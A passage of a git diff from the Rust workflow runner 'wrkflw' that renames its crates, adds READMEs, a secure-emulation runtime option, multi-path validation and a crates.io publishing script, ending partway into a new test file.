Err(_) => {
logging::debug(
"Failed to redirect stderr when checking Docker availability.",
);
false
}
};
let is_docker_available = match wrkflw_utils::fd::with_stderr_to_null(
wrkflw_executor::docker::is_available,
) {
Ok(result) => result,
Err(_) => {
wrkflw_logging::debug(
"Failed to redirect stderr when checking Docker availability.",
);
false
}
};
status_items.push(Span::raw(" "));
status_items.push(Span::styled(
@@ -79,16 +81,17 @@ pub fn render_status_bar(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App,
}
RuntimeType::Podman => {
// Check Podman silently using safe FD redirection
let is_podman_available =
match utils::fd::with_stderr_to_null(executor::podman::is_available) {
Ok(result) => result,
Err(_) => {
logging::debug(
"Failed to redirect stderr when checking Podman availability.",
);
false
}
};
let is_podman_available = match wrkflw_utils::fd::with_stderr_to_null(
wrkflw_executor::podman::is_available,
) {
Ok(result) => result,
Err(_) => {
wrkflw_logging::debug(
"Failed to redirect stderr when checking Podman availability.",
);
false
}
};
status_items.push(Span::raw(" "));
status_items.push(Span::styled(
@@ -106,6 +109,12 @@ pub fn render_status_bar(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App,
.fg(Color::White),
));
}
RuntimeType::SecureEmulation => {
status_items.push(Span::styled(
" 🔒SECURE ",
Style::default().bg(Color::Green).fg(Color::White),
));
}
RuntimeType::Emulation => {
// No need to check anything for emulation mode
}
@@ -159,7 +168,7 @@ pub fn render_status_bar(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App,
}
2 => {
// For logs tab, show scrolling instructions
let log_count = app.logs.len() + logging::get_logs().len();
let log_count = app.logs.len() + wrkflw_logging::get_logs().len();
if log_count > 0 {
// Convert to a static string for consistent return type
let scroll_text = format!(
@@ -172,7 +181,7 @@ pub fn render_status_bar(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App,
"[No logs to display]"
}
}
3 => "[?] Toggle help overlay",
3 => "[↑/↓] Scroll help [?] Toggle help overlay",
_ => "",
};
status_items.push(Span::styled(

View File

@@ -1,13 +1,18 @@
[package]
name = "utils"
name = "wrkflw-utils"
version.workspace = true
edition.workspace = true
description = "utility functions for wrkflw"
description = "Utility functions for wrkflw workflow execution engine"
license.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true
[dependencies]
# Internal crates
models = { path = "../models" }
wrkflw-models = { path = "../models", version = "0.7.0" }
# External dependencies
serde.workspace = true

21
crates/utils/README.md Normal file
View File

@@ -0,0 +1,21 @@
## wrkflw-utils
Shared helpers used across crates.
- Workflow file detection (`.github/workflows/*.yml`, `.gitlab-ci.yml`)
- File-descriptor redirection utilities for silencing noisy subprocess output
### Example
```rust
use std::path::Path;
use wrkflw_utils::{is_workflow_file, fd::with_stderr_to_null};
assert!(is_workflow_file(Path::new(".github/workflows/ci.yml")));
let value = with_stderr_to_null(|| {
eprintln!("this is hidden");
42
}).unwrap();
assert_eq!(value, 42);
```

View File

@@ -1,14 +1,19 @@
[package]
name = "validators"
name = "wrkflw-validators"
version.workspace = true
edition.workspace = true
description = "validation functionality for wrkflw"
description = "Workflow validation functionality for wrkflw execution engine"
license.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true
[dependencies]
# Internal crates
models = { path = "../models" }
matrix = { path = "../matrix" }
wrkflw-models = { path = "../models", version = "0.7.0" }
wrkflw-matrix = { path = "../matrix", version = "0.7.0" }
# External dependencies
serde.workspace = true

View File

@@ -0,0 +1,29 @@
## wrkflw-validators
Validation utilities for workflows and steps.
- Validates GitHub Actions sections: jobs, steps, actions references, triggers
- GitLab pipeline validation helpers
- Matrix-specific validation
### Example
```rust
use serde_yaml::Value;
use wrkflw_models::ValidationResult;
use wrkflw_validators::{validate_jobs, validate_triggers};
let yaml: Value = serde_yaml::from_str(r#"name: demo
on: [workflow_dispatch]
jobs: { build: { runs-on: ubuntu-latest, steps: [] } }
"#).unwrap();
let mut res = ValidationResult::new();
if let Some(on) = yaml.get("on") {
validate_triggers(on, &mut res);
}
if let Some(jobs) = yaml.get("jobs") {
validate_jobs(jobs, &mut res);
}
assert!(res.is_valid);
```

View File

@@ -1,4 +1,4 @@
use models::ValidationResult;
use wrkflw_models::ValidationResult;
pub fn validate_action_reference(
action_ref: &str,

View File

@@ -1,6 +1,6 @@
use models::gitlab::{Job, Pipeline};
use models::ValidationResult;
use std::collections::HashMap;
use wrkflw_models::gitlab::{Job, Pipeline};
use wrkflw_models::ValidationResult;
/// Validate a GitLab CI/CD pipeline
pub fn validate_gitlab_pipeline(pipeline: &Pipeline) -> ValidationResult {
@@ -65,7 +65,7 @@ fn validate_jobs(jobs: &HashMap<String, Job>, result: &mut ValidationResult) {
// Check retry configuration
if let Some(retry) = &job.retry {
match retry {
models::gitlab::Retry::MaxAttempts(attempts) => {
wrkflw_models::gitlab::Retry::MaxAttempts(attempts) => {
if *attempts > 10 {
result.add_issue(format!(
"Job '{}' has excessive retry count: {}. Consider reducing to avoid resource waste",
@@ -73,7 +73,7 @@ fn validate_jobs(jobs: &HashMap<String, Job>, result: &mut ValidationResult) {
));
}
}
models::gitlab::Retry::Detailed { max, when: _ } => {
wrkflw_models::gitlab::Retry::Detailed { max, when: _ } => {
if *max > 10 {
result.add_issue(format!(
"Job '{}' has excessive retry count: {}. Consider reducing to avoid resource waste",

View File

@@ -1,6 +1,6 @@
use crate::{validate_matrix, validate_steps};
use models::ValidationResult;
use serde_yaml::Value;
use wrkflw_models::ValidationResult;
pub fn validate_jobs(jobs: &Value, result: &mut ValidationResult) {
if let Value::Mapping(jobs_map) = jobs {

View File

@@ -1,5 +1,5 @@
use models::ValidationResult;
use serde_yaml::Value;
use wrkflw_models::ValidationResult;
pub fn validate_matrix(matrix: &Value, result: &mut ValidationResult) {
// Check if matrix is a mapping

View File

@@ -1,7 +1,7 @@
use crate::validate_action_reference;
use models::ValidationResult;
use serde_yaml::Value;
use std::collections::HashSet;
use wrkflw_models::ValidationResult;
pub fn validate_steps(steps: &[Value], job_name: &str, result: &mut ValidationResult) {
let mut step_ids: HashSet<String> = HashSet::new();

View File

@@ -1,5 +1,5 @@
use models::ValidationResult;
use serde_yaml::Value;
use wrkflw_models::ValidationResult;
pub fn validate_triggers(on: &Value, result: &mut ValidationResult) {
let valid_events = vec![

View File

@@ -12,18 +12,18 @@ license.workspace = true
[dependencies]
# Workspace crates
models = { path = "../models" }
executor = { path = "../executor" }
github = { path = "../github" }
gitlab = { path = "../gitlab" }
logging = { path = "../logging" }
matrix = { path = "../matrix" }
parser = { path = "../parser" }
runtime = { path = "../runtime" }
ui = { path = "../ui" }
utils = { path = "../utils" }
validators = { path = "../validators" }
evaluator = { path = "../evaluator" }
wrkflw-models = { path = "../models", version = "0.7.0" }
wrkflw-executor = { path = "../executor", version = "0.7.0" }
wrkflw-github = { path = "../github", version = "0.7.0" }
wrkflw-gitlab = { path = "../gitlab", version = "0.7.0" }
wrkflw-logging = { path = "../logging", version = "0.7.0" }
wrkflw-matrix = { path = "../matrix", version = "0.7.0" }
wrkflw-parser = { path = "../parser", version = "0.7.0" }
wrkflw-runtime = { path = "../runtime", version = "0.7.0" }
wrkflw-ui = { path = "../ui", version = "0.7.0" }
wrkflw-utils = { path = "../utils", version = "0.7.0" }
wrkflw-validators = { path = "../validators", version = "0.7.0" }
wrkflw-evaluator = { path = "../evaluator", version = "0.7.0" }
# External dependencies
clap.workspace = true
@@ -62,4 +62,4 @@ path = "src/lib.rs"
[[bin]]
name = "wrkflw"
path = "src/main.rs"
path = "src/main.rs"

112
crates/wrkflw/README.md Normal file
View File

@@ -0,0 +1,112 @@
## WRKFLW (CLI and Library)
This crate provides the `wrkflw` command-line interface and a thin library surface that ties together all WRKFLW subcrates. It lets you validate and execute GitHub Actions workflows and GitLab CI pipelines locally, with a built-in TUI for an interactive experience.
- **Validate**: Lints structure and common mistakes in workflow/pipeline files
- **Run**: Executes jobs locally using Docker, Podman, or emulation (no containers)
- **TUI**: Interactive terminal UI for browsing workflows, running, and viewing logs
- **Trigger**: Manually trigger remote runs on GitHub/GitLab
### Installation
```bash
cargo install wrkflw
```
### Quick start
```bash
# Launch the TUI (auto-loads .github/workflows)
wrkflw
# Validate all workflows in the default directory
wrkflw validate
# Validate a specific file or directory
wrkflw validate .github/workflows/ci.yml
wrkflw validate path/to/workflows
# Validate multiple files and/or directories
wrkflw validate path/to/flow-1.yml path/to/flow-2.yml path/to/workflows
# Run a workflow (Docker by default)
wrkflw run .github/workflows/ci.yml
# Use Podman or emulation instead of Docker
wrkflw run --runtime podman .github/workflows/ci.yml
wrkflw run --runtime emulation .github/workflows/ci.yml
# Open the TUI explicitly
wrkflw tui
wrkflw tui --runtime podman
```
### Commands
- **validate**: Validate workflow/pipeline files and/or directories
- GitHub (default): `.github/workflows/*.yml`
- GitLab: `.gitlab-ci.yml` or files ending with `gitlab-ci.yml`
- Accepts multiple paths in a single invocation
- Exit code behavior (by default): `1` when any validation failure is detected
- Flags: `--gitlab`, `--exit-code`, `--no-exit-code`, `--verbose`
- **run**: Execute a workflow or pipeline locally
- Runtimes: `docker` (default), `podman`, `emulation`
- Flags: `--runtime`, `--preserve-containers-on-failure`, `--gitlab`, `--verbose`
- **tui**: Interactive terminal interface
- Browse workflows, execute, and inspect logs and job details
- **trigger**: Trigger a GitHub workflow (requires `GITHUB_TOKEN`)
- **trigger-gitlab**: Trigger a GitLab pipeline (requires `GITLAB_TOKEN`)
- **list**: Show detected workflows and pipelines in the repo
### Environment variables
- **GITHUB_TOKEN**: Required for `trigger` when calling GitHub
- **GITLAB_TOKEN**: Required for `trigger-gitlab` (api scope)
### Exit codes
- `validate`: `0` if all pass; `1` if any fail (unless `--no-exit-code`)
- `run`: `0` on success, `1` if execution fails
### Library usage
This crate re-exports subcrates for convenience if you want to embed functionality:
```rust
use std::path::Path;
use wrkflw::executor::{execute_workflow, ExecutionConfig, RuntimeType};
# tokio_test::block_on(async {
let cfg = ExecutionConfig {
runtime_type: RuntimeType::Docker,
verbose: true,
preserve_containers_on_failure: false,
};
let result = execute_workflow(Path::new(".github/workflows/ci.yml"), cfg).await?;
println!("status: {:?}", result.summary_status);
# Ok::<_, Box<dyn std::error::Error>>(())
# })?;
```
You can also run the TUI programmatically:
```rust
use std::path::PathBuf;
use wrkflw::executor::RuntimeType;
use wrkflw::ui::run_wrkflw_tui;
# tokio_test::block_on(async {
let path = PathBuf::from(".github/workflows");
run_wrkflw_tui(Some(&path), RuntimeType::Docker, true, false).await?;
# Ok::<_, Box<dyn std::error::Error>>(())
# })?;
```
### Notes
- See the repository root README for feature details, limitations, and a full walkthrough.
- Service containers and advanced Actions features are best supported in Docker/Podman modes.
- Emulation mode skips containerized steps and runs commands on the host.

View File

@@ -1,12 +1,12 @@
pub use evaluator;
pub use executor;
pub use github;
pub use gitlab;
pub use logging;
pub use matrix;
pub use models;
pub use parser;
pub use runtime;
pub use ui;
pub use utils;
pub use validators;
pub use wrkflw_evaluator as evaluator;
pub use wrkflw_executor as executor;
pub use wrkflw_github as github;
pub use wrkflw_gitlab as gitlab;
pub use wrkflw_logging as logging;
pub use wrkflw_matrix as matrix;
pub use wrkflw_models as models;
pub use wrkflw_parser as parser;
pub use wrkflw_runtime as runtime;
pub use wrkflw_ui as ui;
pub use wrkflw_utils as utils;
pub use wrkflw_validators as validators;

View File

@@ -10,16 +10,19 @@ enum RuntimeChoice {
Docker,
/// Use Podman containers for isolation
Podman,
/// Use process emulation mode (no containers)
/// Use process emulation mode (no containers, UNSAFE)
Emulation,
/// Use secure emulation mode with sandboxing (recommended for untrusted code)
SecureEmulation,
}
impl From<RuntimeChoice> for executor::RuntimeType {
impl From<RuntimeChoice> for wrkflw_executor::RuntimeType {
fn from(choice: RuntimeChoice) -> Self {
match choice {
RuntimeChoice::Docker => executor::RuntimeType::Docker,
RuntimeChoice::Podman => executor::RuntimeType::Podman,
RuntimeChoice::Emulation => executor::RuntimeType::Emulation,
RuntimeChoice::Docker => wrkflw_executor::RuntimeType::Docker,
RuntimeChoice::Podman => wrkflw_executor::RuntimeType::Podman,
RuntimeChoice::Emulation => wrkflw_executor::RuntimeType::Emulation,
RuntimeChoice::SecureEmulation => wrkflw_executor::RuntimeType::SecureEmulation,
}
}
}
@@ -48,8 +51,9 @@ struct Wrkflw {
enum Commands {
/// Validate workflow or pipeline files
Validate {
/// Path to workflow/pipeline file or directory (defaults to .github/workflows)
path: Option<PathBuf>,
/// Path(s) to workflow/pipeline file(s) or directory(ies) (defaults to .github/workflows if none provided)
#[arg(value_name = "path", num_args = 0..)]
paths: Vec<PathBuf>,
/// Explicitly validate as GitLab CI/CD pipeline
#[arg(long)]
@@ -69,7 +73,7 @@ enum Commands {
/// Path to workflow/pipeline file to execute
path: PathBuf,
/// Container runtime to use (docker, podman, emulation)
/// Container runtime to use (docker, podman, emulation, secure-emulation)
#[arg(short, long, value_enum, default_value = "docker")]
runtime: RuntimeChoice,
@@ -91,7 +95,7 @@ enum Commands {
/// Path to workflow file or directory (defaults to .github/workflows)
path: Option<PathBuf>,
/// Container runtime to use (docker, podman, emulation)
/// Container runtime to use (docker, podman, emulation, secure-emulation)
#[arg(short, long, value_enum, default_value = "docker")]
runtime: RuntimeChoice,
@@ -143,7 +147,7 @@ fn parse_key_val(s: &str) -> Result<(String, String), String> {
}
// Make this function public for testing? Or move to a utils/cleanup mod?
// Or call executor::cleanup and runtime::cleanup directly?
// Or call wrkflw_executor::cleanup and wrkflw_runtime::cleanup directly?
// Let's try calling them directly for now.
async fn cleanup_on_exit() {
// Clean up Docker resources if available, but don't let it block indefinitely
@@ -151,35 +155,35 @@ async fn cleanup_on_exit() {
match Docker::connect_with_local_defaults() {
Ok(docker) => {
// Assuming cleanup_resources exists in executor crate
executor::cleanup_resources(&docker).await;
wrkflw_executor::cleanup_resources(&docker).await;
}
Err(_) => {
// Docker not available
logging::info("Docker not available, skipping Docker cleanup");
wrkflw_logging::info("Docker not available, skipping Docker cleanup");
}
}
})
.await
{
Ok(_) => logging::debug("Docker cleanup completed successfully"),
Err(_) => {
logging::warning("Docker cleanup timed out after 3 seconds, continuing with shutdown")
}
Ok(_) => wrkflw_logging::debug("Docker cleanup completed successfully"),
Err(_) => wrkflw_logging::warning(
"Docker cleanup timed out after 3 seconds, continuing with shutdown",
),
}
// Always clean up emulation resources
match tokio::time::timeout(
std::time::Duration::from_secs(2),
// Assuming cleanup_resources exists in runtime::emulation module
runtime::emulation::cleanup_resources(),
// Assuming cleanup_resources exists in wrkflw_runtime::emulation module
wrkflw_runtime::emulation::cleanup_resources(),
)
.await
{
Ok(_) => logging::debug("Emulation cleanup completed successfully"),
Err(_) => logging::warning("Emulation cleanup timed out, continuing with shutdown"),
Ok(_) => wrkflw_logging::debug("Emulation cleanup completed successfully"),
Err(_) => wrkflw_logging::warning("Emulation cleanup timed out, continuing with shutdown"),
}
logging::info("Resource cleanup completed");
wrkflw_logging::info("Resource cleanup completed");
}
async fn handle_signals() {
@@ -207,7 +211,7 @@ async fn handle_signals() {
"Cleanup taking too long (over {} seconds), forcing exit...",
hard_exit_time.as_secs()
);
logging::error("Forced exit due to cleanup timeout");
wrkflw_logging::error("Forced exit due to cleanup timeout");
std::process::exit(1);
});
@@ -266,19 +270,41 @@ fn is_gitlab_pipeline(path: &Path) -> bool {
#[tokio::main]
async fn main() {
// Gracefully handle Broken pipe (EPIPE) when output is piped (e.g., to `head`)
let default_panic_hook = std::panic::take_hook();
std::panic::set_hook(Box::new(move |info| {
let mut is_broken_pipe = false;
if let Some(s) = info.payload().downcast_ref::<&str>() {
if s.contains("Broken pipe") {
is_broken_pipe = true;
}
}
if let Some(s) = info.payload().downcast_ref::<String>() {
if s.contains("Broken pipe") {
is_broken_pipe = true;
}
}
if is_broken_pipe {
// Treat as a successful, short-circuited exit
std::process::exit(0);
}
// Fallback to the default hook for all other panics
default_panic_hook(info);
}));
let cli = Wrkflw::parse();
let verbose = cli.verbose;
let debug = cli.debug;
// Set log level based on command line flags
if debug {
logging::set_log_level(logging::LogLevel::Debug);
logging::debug("Debug mode enabled - showing detailed logs");
wrkflw_logging::set_log_level(wrkflw_logging::LogLevel::Debug);
wrkflw_logging::debug("Debug mode enabled - showing detailed logs");
} else if verbose {
logging::set_log_level(logging::LogLevel::Info);
logging::info("Verbose mode enabled");
wrkflw_logging::set_log_level(wrkflw_logging::LogLevel::Info);
wrkflw_logging::info("Verbose mode enabled");
} else {
logging::set_log_level(logging::LogLevel::Warning);
wrkflw_logging::set_log_level(wrkflw_logging::LogLevel::Warning);
}
// Setup a Ctrl+C handler that runs in the background
@@ -286,65 +312,78 @@ async fn main() {
match &cli.command {
Some(Commands::Validate {
path,
paths,
gitlab,
exit_code,
no_exit_code,
}) => {
// Determine the path to validate
let validate_path = path
.clone()
.unwrap_or_else(|| PathBuf::from(".github/workflows"));
// Check if the path exists
if !validate_path.exists() {
eprintln!("Error: Path does not exist: {}", validate_path.display());
std::process::exit(1);
}
// Determine the paths to validate (default to .github/workflows when none provided)
let validate_paths: Vec<PathBuf> = if paths.is_empty() {
vec![PathBuf::from(".github/workflows")]
} else {
paths.clone()
};
// Determine if we're validating a GitLab pipeline based on the --gitlab flag or file detection
let force_gitlab = *gitlab;
let mut validation_failed = false;
if validate_path.is_dir() {
// Validate all workflow files in the directory
let entries = std::fs::read_dir(&validate_path)
.expect("Failed to read directory")
.filter_map(|entry| entry.ok())
.filter(|entry| {
entry.path().is_file()
&& entry
.path()
.extension()
.is_some_and(|ext| ext == "yml" || ext == "yaml")
})
.collect::<Vec<_>>();
for validate_path in validate_paths {
// Check if the path exists; if not, mark failure but continue
if !validate_path.exists() {
eprintln!("Error: Path does not exist: {}", validate_path.display());
validation_failed = true;
continue;
}
println!("Validating {} workflow file(s)...", entries.len());
if validate_path.is_dir() {
// Validate all workflow files in the directory
let entries = std::fs::read_dir(&validate_path)
.expect("Failed to read directory")
.filter_map(|entry| entry.ok())
.filter(|entry| {
entry.path().is_file()
&& entry
.path()
.extension()
.is_some_and(|ext| ext == "yml" || ext == "yaml")
})
.collect::<Vec<_>>();
for entry in entries {
let path = entry.path();
let is_gitlab = force_gitlab || is_gitlab_pipeline(&path);
println!(
"Validating {} workflow file(s) in {}...",
entries.len(),
validate_path.display()
);
for entry in entries {
let path = entry.path();
let is_gitlab = force_gitlab || is_gitlab_pipeline(&path);
let file_failed = if is_gitlab {
validate_gitlab_pipeline(&path, verbose)
} else {
validate_github_workflow(&path, verbose)
};
if file_failed {
validation_failed = true;
}
}
} else {
// Validate a single workflow file
let is_gitlab = force_gitlab || is_gitlab_pipeline(&validate_path);
let file_failed = if is_gitlab {
validate_gitlab_pipeline(&path, verbose)
validate_gitlab_pipeline(&validate_path, verbose)
} else {
validate_github_workflow(&path, verbose)
validate_github_workflow(&validate_path, verbose)
};
if file_failed {
validation_failed = true;
}
}
} else {
// Validate a single workflow file
let is_gitlab = force_gitlab || is_gitlab_pipeline(&validate_path);
validation_failed = if is_gitlab {
validate_gitlab_pipeline(&validate_path, verbose)
} else {
validate_github_workflow(&validate_path, verbose)
};
}
// Set exit code if validation failed and exit_code flag is true (and no_exit_code is false)
@@ -360,7 +399,7 @@ async fn main() {
gitlab,
}) => {
// Create execution configuration
let config = executor::ExecutionConfig {
let config = wrkflw_executor::ExecutionConfig {
runtime_type: runtime.clone().into(),
verbose,
preserve_containers_on_failure: *preserve_containers_on_failure,
@@ -374,10 +413,10 @@ async fn main() {
"GitHub workflow"
};
logging::info(&format!("Running {} at: {}", workflow_type, path.display()));
wrkflw_logging::info(&format!("Running {} at: {}", workflow_type, path.display()));
// Execute the workflow
let result = executor::execute_workflow(path, config)
let result = wrkflw_executor::execute_workflow(path, config)
.await
.unwrap_or_else(|e| {
eprintln!("Error executing workflow: {}", e);
@@ -419,15 +458,15 @@ async fn main() {
println!(
" {} {} ({})",
match job.status {
executor::JobStatus::Success => "",
executor::JobStatus::Failure => "",
executor::JobStatus::Skipped => "⏭️",
wrkflw_executor::JobStatus::Success => "",
wrkflw_executor::JobStatus::Failure => "",
wrkflw_executor::JobStatus::Skipped => "⏭️",
},
job.name,
match job.status {
executor::JobStatus::Success => "success",
executor::JobStatus::Failure => "failure",
executor::JobStatus::Skipped => "skipped",
wrkflw_executor::JobStatus::Success => "success",
wrkflw_executor::JobStatus::Failure => "failure",
wrkflw_executor::JobStatus::Skipped => "skipped",
}
);
@@ -435,15 +474,15 @@ async fn main() {
println!(" Steps:");
for step in job.steps {
let step_status = match step.status {
executor::StepStatus::Success => "",
executor::StepStatus::Failure => "",
executor::StepStatus::Skipped => "⏭️",
wrkflw_executor::StepStatus::Success => "",
wrkflw_executor::StepStatus::Failure => "",
wrkflw_executor::StepStatus::Skipped => "⏭️",
};
println!(" {} {}", step_status, step.name);
// If step failed and we're not in verbose mode, show condensed error info
if step.status == executor::StepStatus::Failure && !verbose {
if step.status == wrkflw_executor::StepStatus::Failure && !verbose {
// Extract error information from step output
let error_lines = step
.output
@@ -482,7 +521,7 @@ async fn main() {
.map(|v| v.iter().cloned().collect::<HashMap<String, String>>());
// Trigger the pipeline
if let Err(e) = gitlab::trigger_pipeline(branch.as_deref(), variables).await {
if let Err(e) = wrkflw_gitlab::trigger_pipeline(branch.as_deref(), variables).await {
eprintln!("Error triggering GitLab pipeline: {}", e);
std::process::exit(1);
}
@@ -497,7 +536,7 @@ async fn main() {
let runtime_type = runtime.clone().into();
// Call the TUI implementation from the ui crate
if let Err(e) = ui::run_wrkflw_tui(
if let Err(e) = wrkflw_ui::run_wrkflw_tui(
path.as_ref(),
runtime_type,
verbose,
@@ -520,7 +559,9 @@ async fn main() {
.map(|i| i.iter().cloned().collect::<HashMap<String, String>>());
// Trigger the workflow
if let Err(e) = github::trigger_workflow(workflow, branch.as_deref(), inputs).await {
if let Err(e) =
wrkflw_github::trigger_workflow(workflow, branch.as_deref(), inputs).await
{
eprintln!("Error triggering GitHub workflow: {}", e);
std::process::exit(1);
}
@@ -530,10 +571,10 @@ async fn main() {
}
None => {
// Launch TUI by default when no command is provided
let runtime_type = executor::RuntimeType::Docker;
let runtime_type = wrkflw_executor::RuntimeType::Docker;
// Call the TUI implementation from the ui crate with default path
if let Err(e) = ui::run_wrkflw_tui(None, runtime_type, verbose, false).await {
if let Err(e) = wrkflw_ui::run_wrkflw_tui(None, runtime_type, verbose, false).await {
eprintln!("Error running TUI: {}", e);
std::process::exit(1);
}
@@ -547,13 +588,13 @@ fn validate_github_workflow(path: &Path, verbose: bool) -> bool {
print!("Validating GitHub workflow file: {}... ", path.display());
// Use the ui crate's validate_workflow function
match ui::validate_workflow(path, verbose) {
match wrkflw_ui::validate_workflow(path, verbose) {
Ok(_) => {
// The detailed validation output is already printed by the function
// We need to check if there were validation issues
// Since ui::validate_workflow doesn't return the validation result directly,
// Since wrkflw_ui::validate_workflow doesn't return the validation result directly,
// we need to call the evaluator directly to get the result
match evaluator::evaluate_workflow_file(path, verbose) {
match wrkflw_evaluator::evaluate_workflow_file(path, verbose) {
Ok(result) => !result.is_valid,
Err(_) => true, // Parse errors count as validation failure
}
@@ -571,12 +612,12 @@ fn validate_gitlab_pipeline(path: &Path, verbose: bool) -> bool {
print!("Validating GitLab CI pipeline file: {}... ", path.display());
// Parse and validate the pipeline file
match parser::gitlab::parse_pipeline(path) {
match wrkflw_parser::gitlab::parse_pipeline(path) {
Ok(pipeline) => {
println!("✅ Valid syntax");
// Additional structural validation
let validation_result = validators::validate_gitlab_pipeline(&pipeline);
let validation_result = wrkflw_validators::validate_gitlab_pipeline(&pipeline);
if !validation_result.is_valid {
println!("⚠️ Validation issues:");

179
publish_crates.sh Executable file
View File

@@ -0,0 +1,179 @@
#!/bin/bash
# Enhanced script to manage versions and publish all wrkflw crates using cargo-workspaces
set -e
# Parse command line arguments
COMMAND=${1:-""}
VERSION_TYPE=${2:-""}
DRY_RUN=""
show_help() {
echo "Usage: $0 <command> [options]"
echo ""
echo "Commands:"
echo " version <type> Update versions across workspace"
echo " Types: patch, minor, major"
echo " publish Publish all crates to crates.io"
echo " release <type> Update versions and publish (combines version + publish)"
echo " help Show this help message"
echo ""
echo "Options:"
echo " --dry-run Test without making changes (for publish/release)"
echo ""
echo "Examples:"
echo " $0 version minor # Bump to 0.7.0"
echo " $0 publish --dry-run # Test publishing"
echo " $0 release minor --dry-run # Test version bump + publish"
echo " $0 release patch # Release patch version"
}
# Parse dry-run flag from any position
for arg in "$@"; do
if [[ "$arg" == "--dry-run" ]]; then
DRY_RUN="--dry-run"
fi
done
case "$COMMAND" in
"help"|"-h"|"--help"|"")
show_help
exit 0
;;
"version")
if [[ -z "$VERSION_TYPE" ]]; then
echo "❌ Error: Version type required (patch, minor, major)"
echo ""
show_help
exit 1
fi
;;
"publish")
# publish command doesn't need version type
;;
"release")
if [[ -z "$VERSION_TYPE" ]]; then
echo "❌ Error: Version type required for release (patch, minor, major)"
echo ""
show_help
exit 1
fi
;;
*)
echo "❌ Error: Unknown command '$COMMAND'"
echo ""
show_help
exit 1
;;
esac
# Check if cargo-workspaces is installed
if ! command -v cargo-workspaces &> /dev/null; then
echo "❌ cargo-workspaces not found. Installing..."
cargo install cargo-workspaces
fi
# Check if we're logged in to crates.io (only for publish operations)
if [[ "$COMMAND" == "publish" ]] || [[ "$COMMAND" == "release" ]]; then
if [ ! -f ~/.cargo/credentials.toml ] && [ ! -f ~/.cargo/credentials ]; then
echo "❌ Not logged in to crates.io. Please run: cargo login <your-token>"
exit 1
fi
fi
# Function to update versions
update_versions() {
local version_type=$1
echo "🔄 Updating workspace versions ($version_type)..."
if [[ "$DRY_RUN" == "--dry-run" ]]; then
echo "🧪 DRY RUN: Simulating version update"
echo ""
echo "Current workspace version: $(grep '^version =' Cargo.toml | cut -d'"' -f2)"
echo "Would execute: cargo workspaces version $version_type"
echo ""
echo "This would update all crates and their internal dependencies."
echo "✅ Version update simulation completed (no changes made)"
else
cargo workspaces version "$version_type"
echo "✅ Versions updated successfully"
fi
}
# Function to test build
test_build() {
echo "🔨 Testing workspace build..."
if cargo build --workspace; then
echo "✅ Workspace builds successfully"
else
echo "❌ Build failed. Please fix errors before publishing."
exit 1
fi
}
# Function to publish crates
publish_crates() {
echo "📦 Publishing crates to crates.io..."
if [[ "$DRY_RUN" == "--dry-run" ]]; then
echo "🧪 DRY RUN: Testing publication"
cargo workspaces publish --dry-run
echo "✅ All crates passed dry-run tests!"
echo ""
echo "To actually publish, run:"
echo " $0 publish"
else
cargo workspaces publish
echo "🎉 All crates published successfully!"
echo ""
echo "Users can now install wrkflw with:"
echo " cargo install wrkflw"
fi
}
# Function to show changelog info
show_changelog_info() {
echo "📝 Changelog will be generated automatically by GitHub Actions workflow"
}
# Execute commands based on the operation
case "$COMMAND" in
"version")
update_versions "$VERSION_TYPE"
show_changelog_info
;;
"publish")
test_build
publish_crates
;;
"release")
echo "🚀 Starting release process..."
echo ""
# Step 1: Update versions
update_versions "$VERSION_TYPE"
# Step 2: Test build
test_build
# Step 3: Show changelog info
show_changelog_info
# Step 4: Publish (if not dry-run)
if [[ "$DRY_RUN" != "--dry-run" ]]; then
echo ""
read -p "🤔 Continue with publishing? (y/N): " -n 1 -r
echo
if [[ $REPLY =~ ^[Yy]$ ]]; then
publish_crates
else
echo "⏸️ Publishing cancelled. To publish later, run:"
echo " $0 publish"
fi
else
echo ""
publish_crates
fi
;;
esac

View File

@@ -1,6 +1,6 @@
# Testing Strategy
This directory contains integration tests for the `wrkflw` project. We follow the Rust testing best practices by organizing tests as follows:
This directory contains all tests and test-related files for the `wrkflw` project. We follow the Rust testing best practices by organizing tests as follows:
## Test Organization
@@ -11,6 +11,17 @@ This directory contains integration tests for the `wrkflw` project. We follow th
- **End-to-End Tests**: Also located in this `tests/` directory
- `cleanup_test.rs` - Tests for cleanup functionality with Docker resources
## Test Directory Structure
- **`fixtures/`**: Test data and configuration files
- `gitlab-ci/` - GitLab CI configuration files for testing
- **`workflows/`**: GitHub Actions workflow files for testing
- Various YAML files for testing workflow validation and execution
- **`scripts/`**: Test automation scripts
- `test-podman-basic.sh` - Basic Podman integration test script
- `test-preserve-containers.sh` - Container preservation testing script
- **`TESTING_PODMAN.md`**: Comprehensive Podman testing documentation
## Running Tests
To run all tests:

View File

@@ -70,21 +70,21 @@ Expected: Should show `--runtime` option with default value `docker`.
#### 1.2 Test Podman Runtime Selection
```bash
# Should accept podman as runtime
./target/release/wrkflw run --runtime podman test-workflows/example.yml
./target/release/wrkflw run --runtime podman tests/workflows/example.yml
```
Expected: Should run without CLI argument errors.
#### 1.3 Test Emulation Runtime Selection
```bash
# Should accept emulation as runtime
./target/release/wrkflw run --runtime emulation test-workflows/example.yml
./target/release/wrkflw run --runtime emulation tests/workflows/example.yml
```
Expected: Should run without CLI argument errors.
#### 1.4 Test Invalid Runtime Selection
```bash
# Should reject invalid runtime
./target/release/wrkflw run --runtime invalid test-workflows/example.yml
./target/release/wrkflw run --runtime invalid tests/workflows/example.yml
```
Expected: Should show error about invalid runtime choice.
@@ -172,7 +172,7 @@ Expected: All three runtimes should produce similar results (emulation may have
#### 4.1 Test TUI Runtime Selection
```bash
./target/release/wrkflw tui test-workflows/
./target/release/wrkflw tui tests/workflows/
```
**Test Steps:**

View File

@@ -0,0 +1,120 @@
use std::fs;
use tempfile::tempdir;
use wrkflw::executor::engine::{execute_workflow, ExecutionConfig, RuntimeType};
fn write_file(path: &std::path::Path, content: &str) {
fs::write(path, content).expect("failed to write file");
}
#[tokio::test]
async fn test_local_reusable_workflow_execution_success() {
// Create temp workspace
let dir = tempdir().unwrap();
let called_path = dir.path().join("called.yml");
let caller_path = dir.path().join("caller.yml");
// Minimal called workflow with one successful job
let called = r#"
